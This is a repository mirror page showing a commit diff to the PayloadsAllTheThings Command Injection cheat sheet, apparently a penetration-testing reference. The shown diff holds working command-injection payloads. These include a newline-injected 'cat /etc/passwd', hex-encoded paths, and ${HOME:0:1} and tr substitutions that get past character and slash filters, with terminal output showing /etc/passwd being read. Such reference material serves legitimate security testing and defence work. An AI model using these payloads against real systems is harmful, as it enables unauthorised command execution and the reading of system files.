gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-12-12 15:49:38 -08:00
Code Issues Packages Projects Releases Wiki Activity

Bind shell cheatsheet (Fix #194)

Browse Source
This commit is contained in:
Swissky
2020-05-24 14:09:46 +02:00
parent c734586e72
commit 4ca5e71c2f
10 changed files with 134 additions and 13 deletions
Download Patch File Download Diff File Expand all files Collapse all files

14
Command Injection/README.md
View File

@@ -111,8 +111,9 @@ something%0Acat%20/etc/passwd
### Bypass characters filter via hex encoding
linux
```
Linux
```powershell
swissky@crashlab ~ $ echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
/etc/passwd
@@ -136,29 +137,22 @@ swissky@crashlab▸ ~ ▸ $ xxd -r -ps <(echo 2f6574632f706173737764)
swissky@crashlab ~ $ cat `xxd -r -ps <(echo 2f6574632f706173737764)`
root:x:0:0:root:/root:/bin/bash
```
### Bypass characters filter
Commands execution without backslash and slash - linux bash
```
```powershell
swissky@crashlab ~ $ echo ${HOME:0:1}
/
swissky@crashlab ~ $ cat ${HOME:0:1}etc${HOME:0:1}passwd
root:x:0:0:root:/root:/bin/bash
swissky@crashlab ~ $ echo . | tr '!-0' '"-1'
/
swissky@crashlab ~ $ tr '!-0' '"-1' <<< .
/
swissky@crashlab ~ $ cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
root:x:0:0:root:/root:/bin/bash
```
### Bypass Blacklisted words